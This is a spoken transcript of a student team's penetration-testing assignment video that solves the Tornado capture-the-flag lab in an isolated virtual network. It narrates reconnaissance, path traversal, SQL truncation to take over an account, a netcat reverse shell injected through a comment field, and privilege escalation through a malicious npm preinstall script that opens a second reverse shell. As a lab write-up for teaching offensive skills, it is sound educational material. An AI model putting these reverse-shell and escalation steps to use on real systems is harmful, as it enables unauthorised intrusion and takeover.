Hello everyone, I am Aryan Vasim and this is our VAPT video log assignment. The vulnerable machine assigned to us was IA Tornado, which we downloaded from OneHub. Before we begin this practical, I would like to show that both these VMs are running. As on the screen, you can see Kali is running, and this is the Tornado vulnerable machine which is running. So before we get into it, I would like to point out one particular network setting that I have configured, which is the network settings. So where, as you can see, I have set it to host only adapter, and I've done the same setting. I have configured the same setting for Tornado, host only adapter. And the reason for this would be explained later in the video. So let's begin. So let's first enter the ifconfig command to identify our own IP address. So over here you can see our IP address is 192.168.56.103 and the subnet mask is 255.255.255.0. Now I'd like to scan the entire network. So for this we'll be using the nmap sn command and enter the IP address as 192.168.56.0/24. The reason for this is a CIDR notation for between our IP address and subnet mask is this. Enter. So here you can see that two hosts are up. One is 192.168.56.103, which is our own IP address. And this IP address, 192.168.56.102, is the IP address for our vulnerable machine Tornado. Now, the reason for me setting the host only adapter settings in networks is this, so that we can identify that the two hosts that are up on our virtual box are the only two hosts like Kali machine and the Tornado machine. So next, we'll check the open ports present on Tornado's IP address. For this, we'll be using the stealth scan command present on the nmap tool. nmap -ss 192.168.56.102. So for this particular command to run, we need to access sudo privileges. So we'll be pressing sudo nmap -ss 192.168.56.102. We'll enter our password, sudo password for Kali, which I cannot reveal. And as you can see, the command has been executed. Let's wait for the results. So now the command has been executed. We have found two hosts that are open on this IP address. One is 22 and one is 80. The only port of focus would be 80, which is the HTTP, which shows that a particular web application has been hosted on this particular IP address. Now the next step in the process will be to perform a directory brute force on the IP. Now we know that port 80 is open, so we'll be performing the dir search command. So the syntax for dir search will be dir search hyphen u, the IP address it will be http colon 192.168.56.102. 102 forward slash hyphen W, which stands for word list, user, share, word lists, dir buster, directory list, 2.3 hyphen medium.txt. The extensions that we'll be using would be PHP, HTML, PY, which is for Python, C, and JS. And enter. So here we can see the command execution has been completed. We can see we have found several directories hosted on the web server, which is the manual, JavaScript, and the Blue Sky. Now, manual and JavaScript are known directories which are hosted. The one which is interesting is the Blue Sky. So let's check it out. Let's go to our web browser. Type in the IP address of Tornado 10 slash Blue Sky. So now we can see the Blue Sky directory which is hosted on this IP address. So Blue Sky is apparently a maintenance service website. Let's see what all is present here. About Blue Sky, how it works, our services, and so basically a typical service website. Now we'll be performing a page enumeration on this website. So for this we'll be using the GoBuster tool. Now the command for GoBuster would be GoBuster dir, which stands for directory, hyphen u, the IP address, http colon 192.168.56.102 forward slash blue sky forward slash hyphen w. Again, the word list is stored in this directory. User, share, word list, buster, directory list 2.3 medium.txt. And the extension that we'll be looking for are PHP. Voila! Page enumeration has been done. As we can see that we have found several pages over here, which is contact.php, about.php, login.php, signout.php, and other various other page enumerations. So first we'll go with signup.php. Now while signing up, we'll be using random credentials to sign up. So bluesky.signup.php. Here we are at the sign up page of Blue Sky. Now I'll be entering a random email address such as tbc@gmail.com and the password will be 123 and I will sign up. As you can see, the dialog box says that I have been registered successfully. Okay. And since we have seen in the page enumeration that we can also go to login.php. Now we are at login.php. We will be signing up using the credential that we entered, which is abc@gmail.com, and the password is 123. And we have successfully logged in. So here we can see the dashboard and the home page which says welcome user abc@gmail.com. The about section which says hey, that's all I have to tell you. Portfolio which says L5 vulnerabilities patch, but still don't forget to test for it again. The next is contact which says command feature has been turned off because of security purpose. We'll see about this later in the video. And finally the logout page. So now I'll be handing over to Aditya Jaydevan for the further practical explanation.
Hi, I'm Aditya Jadhavan, and continuing from my teammate Anil Kumar Basin had left off. So here is the dashboard that you can see, where we can see this welcome user apc at gmail.com. This is the user ID that we had registered. Now, if we go to portfolio, we get a small hint that LFI vulnerability is patched, but still don't forget to test for it again. So what we're going to do is we're going to inspect the web page. So we'll be going to the view page source, and over here, if we go down, we can see there's this line 165 that says home/tornado slash import the imp.txt. So we get an idea that what we are supposed to do. So we're gonna modify the URL of this page. We'll be removing this port.php from over here. And what we're gonna do is we're gonna do dot dot slash dot dot slash dot dot slash dot. We're going to do this 4 times, so that what we're going to do is we're going to access a specific file on the system. So we are going to go 4 pages back. We're going to we'll be going to the root directory. From there we can access the home page, which is the hint that we had received. So we'll be writing home slash tornado slash mp.t. So as you can see over here, we are getting not found, which is the URL request URL was not found, and so. So I'm just going to replace the home with tilde. So this is basically a Unix shortcut for the user's home directory. That's why tilde will be working in this. So if I just do here, and if I press enter, you can see we are receiving some of the user IDs. So these user IDs are basically the registered user IDs that is already registered in the Blue Sky web application. So what we're going to do is we'll be opening a new tab. We'll be typing 192.168.6, then Blue Sky hyphen signup.php. So we're gonna go to the signup page, and we'll be here. You can see this is the signup page, and here we'll be performing SQL truncation. So SQL truncation is basically a technique where we are manipulating input data to cause the database to store less information than intended. So this can lead to unexpected behavior vulnerabilities. So through SQL truncation, we'll be logging into the web page with with through the user IDs that we have found. So the user ID that we have found, there's CEO, CTO, manager, HR. So one of the user IDs that can be possible to be able to for us to log in to this to sign up will be Jacob. So we'll be what we're gonna do is writing Jacob at the rate gmail.com at the rate tornado. So we will be writing at Jacob at the rate tornado and space. So here you can see there's this character limit set. That's why we're not able to put a space, and we are not able to add a user ID. So what we're going to do is we'll be going to inspect, and inspect will be changing the max length, the character length, so that we can manipulate the input constraints and introduce the vulnerability that we are trying to do. So I'm doing 130 and then enter. So after doing this, you can see I can able to the space, and I can add one more user ID, which is the user ID that we had registered. And So abc@gmail.com. Now we'll be writing the password. So what is happening is we'll be overwriting the password of Jacob. This is the user ID that is registered. This is authenticated to access the comment section or the other pages in the blue sky. But in our register, we don't have the privileges as the registered user ID has. So that's what we're going to do. So we'll be typing two user IDs. One will be the first one will be the registered user ID. The second is the hoax or the our random ID with the password that we have set. And what it's gonna do is when we are signing up and we are registering it, SQL truncation will be seeing that the first user ID is a registered user ID, so the password will be over it. So when I sign up, you can see I have registered successfully. Now I'll go to the login page. So I have went to the login, and now I'll be uh, signing up with the username of Jacob@Tornado, and password will be the one that we had overwritten. So I'm able to successfully log in. So you can see welcome user Jacob@Tornado. Now, if I go to the contact section here, I can actually access the comment section, which I was not able to do with the other user ID because we didn't have the permission. Now, what I'll do is I'll be performing a comment injection attack. So here, before I do the comment injection, I'll write a script on the comment section. I will I'll be doing a listening on port 4444 with NC, which is netcap. So this is basically a network utility to enable the listening. So I'll be writing NC and hyphen LNVP and 44, and I'll be pressing enter. So this means that now you can see it is showing listening on any 4444. This means that it is preparing to receive connections. This is often used to set up a reverse shell. So now I'll be going to the commands, the dashboard, and I'll be writing a script. So I'll be writing the script for the command injection. So this is the command, this is the script. This is nc-e/bin/sh IP address of our Kali machine, which is 192.168.56.123 and port. So this will be sending an outbound connection from the Tornado to Kali. So after injecting this command, so I've basically uh, injected. Now I'll be writing a Python script. This Python script is basically necessary for enabling the bash shell. This is commonly used to interact with the shell when you have established a connection using a reverse shell. So the command is python-c, then open double quotes, then import pty semicolon pty dot spawn, then bracket, then quote slash bin slash bash, then, then, then closing the bracket, closing the quotes, then I'll be pressing enter. So here you can see I have successfully established a connection, outbound connection from Tornado to Kali, and you can see I'm able to access /var/www/html/blue. Now further demonstration will be done by Akshay Joshi, who will be completing the whole demonstration, finding the two flags and accessing the Tornado.
Hi everyone, I'm Akshat Joshi, and now that we have the access to the reverse shell, our next task is going to be escalating the privilege. And for that, let's try to see what the current permissions of this user are. As per the record, we can see www data can run the following commands on Tornado. As user catch me, it can execute user bin npm, which means it can run npm commands, and npm is a node package manager, which is essentially used to install node libraries and similar files. Because of which, if there is any command that we can inject here, because ultimately since we need a privileged shell, we'll have to inject some kind of script that can establish a netcat connection using npm. So the first thing that we're going to do is to create a package.json file which will be used on the npm install command, and we'll inject the netcat session into the pre-install script of the package.json. So let me quickly nano into a package.json file on my Kali machine, and so as we can see here, we've started off with creating this package.json file wherein we're setting these properties, the name to our account name, the version to 1.0.0, description just as to clearing what the package.json file is doing, the main file that is going to be used. And in the scripts section, we have started a pre-install script, which is the first script that is always run when doing an npm install. And in that pre-install script, we have written the following command. It will remove the /tmp/f if the thing exists already. Then it will make a /tmp/f directory in the FIFO format, which means it will be first in first out. And then eventually what we're going to do is we are going to create a bin shell in interactive mode, and then we're going to netcat into the bin interactive shell on our Kali Linux IP port number 9000, and all of this code has been written to the /tmp/f. So that's our package.json file. Let's quickly write that out. And now that we have our package.json here, what we're going to do is we're going to create a Python server on our machine port 8000. And since we already have the access to the reverse shell, we're going to go on our Tornado, and we'll do a wget on this Tornado to our created HTTP server and fetch this package.json file here. So for that, let's first cd into /temp, then make a directory for our user here, and now let's wget our file from our Kali Linux IP. So we've created an HTTP server on our Kali Linux IP, which is 56.103 on port number 8000, and the file that we are fetching is package.json. So with that being run, the file is successfully fetched, and if I do an ls here, I can see the package.json file. What I'm going to do is I'm going to move this package.json file into the directory that we just created. And with that, our setup is complete. Now what we're going to do is, as seen in the previous command run here, we're going to run the sudo command as catch me user, and we're going to run the npm install on the package.json that we just fetched. So the command is sudo -u catch me /usr/bin/npm which is for install, and then the package.json file from which the install is supposed to be done is located in /tmp/hack, which is the user that we just created. And finally, we're going to mark the flag unsafe just so that it doesn't care about whether the installation is safe or not. We're just giving it away. And when we run that, all right. So this essentially states that we are trying to establish a connection to our IP on Kali Linux, port number 9000, but unfortunately we did not start a listening server there. So what we do is we quickly split the terminal, we create a netcat -lnvp on port number 9000. So now what we're going to do is let's quickly change our directory here to our root folder. And on the root folder, okay, let's switch to /home/tornado, because that's the one that we are trying to access and that's the one we have access to. And here what we're going to do is we're going to run the sudo -u command as the user catch me to usr bin npm, because this is the only command that we can run, and we'll do an install, and the installation will be as /tmp/hack, because that's where our package.json file is located. And we mark this installation as unsafe ourselves so that the npm package manager does not check for itself if the installation is safe or not. And with that we are able to successfully execute the script that was supposed to be inside the uh, package.json file as pre-install, and which means that a netcat session has been sent. And as we can see here, we have a connection request from 192.168.56.102, which is basically our tornado IP. So if we repeat the Python command to access the shell, which is import pty and then pty dot spawn /bin/bash. As we can see here, we are now logged in as catch me on tornado, and what we can do here is we can cd into the root directory of catch me, and here if we do an ls, we find two files. The first one is user.txt, and if we cat user.txt over here, it says hmv keyed Caesar. So hmv is the key pattern for the CTF flag, which means that this is the first flag that we have found. And it also gives us a hint which says that this has got something to do with Caesar, which most probably is going to be Caesar cipher, because I can also see an encrypt enc.py file here. So if we quickly cat enc.py file, you can see that there's a lot of stuff going on here, but essentially what we're interested in is this specific encrypted text, because this is the encrypted version of our key, and we need a specific input for k, which is the key that is going to be used to decrypt this encrypted cipher. And the key, since we don't know it, what we're going to do is we're going to copy this encryption. We're going to go to our browser and we'll try a cracking tool. Its name is Boxcentrics, and it has a Caesar cipher breaking thing that we've already seen. So let's try this on our main machine. And here if we do Boxcentrics Caesar, we can see a Caesar cipher decoder here, and we can paste our copied text here, and since we don't have the key, we'll try to auto solve without the key. And this does seem like we've gotten most of it, and I think we can pretty much make sense out of this now, because there are some alphabets in the middle that are not correctly keyed, but the rest of them are more or less here. So what we're going to do is we're going to go back to our terminal here, and after the cat that we have done, we're going to try to go to su root, and it requires a root password, wherein we are going to enter, I don't know, root password, and there we have it. We have our root shell, and if we go to the root directory of root and try an ls here, we see a file root.txt, and in this root.txt, when we add root.txt, that's the second flag, which is hmv good. So with that, we'd like to conclude the two flags that we've collected will be written here. Great. Thank you so much.